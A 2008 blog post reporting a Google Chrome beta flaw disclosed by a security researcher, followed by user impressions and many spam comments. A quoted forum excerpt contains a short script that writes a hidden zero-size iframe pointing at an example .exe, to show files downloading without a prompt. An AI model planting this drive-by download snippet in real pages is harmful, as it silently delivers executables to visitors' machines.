Google Chrome Browser Vulnerable to Security Flaw

Posted: September 4, 2008 in Reviews
Tags: , ,

A security researcher has published proof-of-concept code showing Google Chrome is vulnerable to an attack targeting an old version of WebKit and a Java bug. News of the flaw came Sept. 2, not long after Google officials announced the launch of the Chrome browser’s beta program. A security researcher has discovered a flaw in the beta version of Google’s Chrome browser that can lead to Windows users downloading malicious Java files.

According to the ZDNET security blog, Israeli security researcher Aviv Raff has released proof-of-concept code that targets a vulnerability in an old version of WebKit being used by the Google browser as well as a Java bug. With a little social engineering, users can be tricked into downloading malware onto Windows desktops.

View: The full story @ eWeek

The following information is from Neowin Forums

Google’s new Web browser (Chrome) allows files (e.g., executables) to be automatically
downloaded to the user’s computer without any user prompt.
Example:
<script>
document.write(‘<iframe src=”http://www.example.com/hello.exe&#8221; frameborder=”0″ width=”0″ height=”0″>’);
</script>

I tested this software on Windows Xp Pro with SP3, seems to be okay. But the compatibility has to be increased to a greater extent in the future

Adobe.com was not working to a full extent

Does not support Microsoft Silver Light at present

Sometimes Gmail does’nt load to full extent

💡 Incase if you would like to use this software, please configure your Firewall for outbound and inbound permissions for Google Chrome

Advertisements
Comments
  1. […] Google Chrome Browser Vulnerable to Security Flaw […]

  2. Is it just me or is the fact that Chrome works outside of “Program Files” a HUGE security flaw? (Check my link to my blog)

    Cheers,

    /Magnus

  3. There’s good info here. I did a search on the topic and found most people will agree with your blog. Keep up the good work mate!

    I’m Out! 🙂

  4. Ted Grupa says:

    Many thanks for this. Just what i was looking for.

  5. Good work over again! I am looking forward for more updates=)

  6. labido says:

    Thank you for your own labor on this web site. My niece takes pleasure in conducting research and it’s really easy to understand why. My partner and i know all of the powerful mode you provide valuable tips and tricks via your web blog and as well as encourage participation from visitors on this area then our child is actually being taught a lot. Take advantage of the rest of the new year. Your performing a very good job.

  7. From now on, it may be a nice idea to come up with a additional post to this. Most individuals want to see this and will wait for it.

  8. I don’t ordinarily comment but I gotta tell appreciate it for the post on this great one : D.

  9. You seem to have a abilty for communicating your knowledge clearly and effectively.This ability to communicate well will surely serve you and your readers well.

  10. Hello just thought i’d let you know some thing.. That is twice now i?ve landed on your weblog inside the final three weeks searching for entirely unrelated issues. Excellent Information! Keep up the beneficial do the job.

  11. Just wanted to let you know and say very great job on your post. I for one agree with what you are explaning and hope to see more of your entries in the near future.

  12. Awesome blog! Loving it! 🙂

  13. I detest seeing at the time of optimised , key phrase stuffed webpages websites or blogs. As you say great for search engines but not for real individuals.

  14. Hey There. I found your blog using msn. This is a very well written article. I will be sure to bookmark it and come back to read more of your useful information. Thanks for the post. I will definitely return.

  15. PITy 2012 says:

    I had choices from essays to videos and I figured blogging can be fun. Can you give me a good free website and a little help on how to get started with what to say, and whether i put it under one day or do it every day until its due. Please help and I promise to select you as the best answer if it helps!.

  16. Kraig says:

    added internet site cannote not unblocked after erase the line

  17. Hai says:

    Do you accept “applications” for official letter writers?

  18. Thanks for sharing excellent informations. Your web-site is so cool. I’m impressed by the details that you have on this website. It reveals how nicely you understand this subject. Bookmarked this website page, will come back for extra articles. You, my friend, ROCK! I found simply the information I already searched all over the place and simply could not come across. What an ideal site.

  19. You’re the worst author

  20. What i don’t understood is actually how you’re not actually much more well-liked than you might be right now. You are very intelligent. You realize thus significantly relating to this subject, produced me personally consider it from so many varied angles. Its like women and men aren’t fascinated unless it’s one thing to do with Lady gaga! Your own stuffs nice. Always maintain it up!

  21. Hey there, I think your website might be having browser compatibility issues. When I look at your website in Ie, it looks fine but when opening in Internet Explorer, it has some overlapping. I just wanted to give you a quick heads up! Other then that, awesome blog!

  22. Hi there, You’ve done a fantastic job. I will definitely digg it and personally recommend to my friends. I’m sure they will be benefited from this website.

  23. I will not talk about your competence, the post simply disgusting

  24. WONDERFUL Post.thanks for share..extra wait .. …

  25. Nice post. I was checking continuously this blog and I’m inspired! Very helpful info particularly the last part 🙂 I handle such info a lot. I used to be seeking this certain information for a long time. Thanks and best of luck.

  26. Right now it looks like Movable Type is the preferred blogging platform available right now. (from what I’ve read) Is that what you are using on your blog?

  27. Greetings I am so excited I found your site, I really found you by mistake, while I was searching on Askjeeve for something else, Regardless I am here now and would just like to say thanks a lot for a marvelous post and a all round exciting blog (I also love the theme/design), I don’t have time to read through it all at the minute but I have bookmarked it and also added in your RSS feeds, so when I have time I will be back to read much more, Please do keep up the great work.

  28. very nice put up, i definitely love this web site, carry on it

  29. It is really a nice and useful piece of information. I’m glad that you shared this helpful information with us. Please keep us up to date like this. Thanks for sharing.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s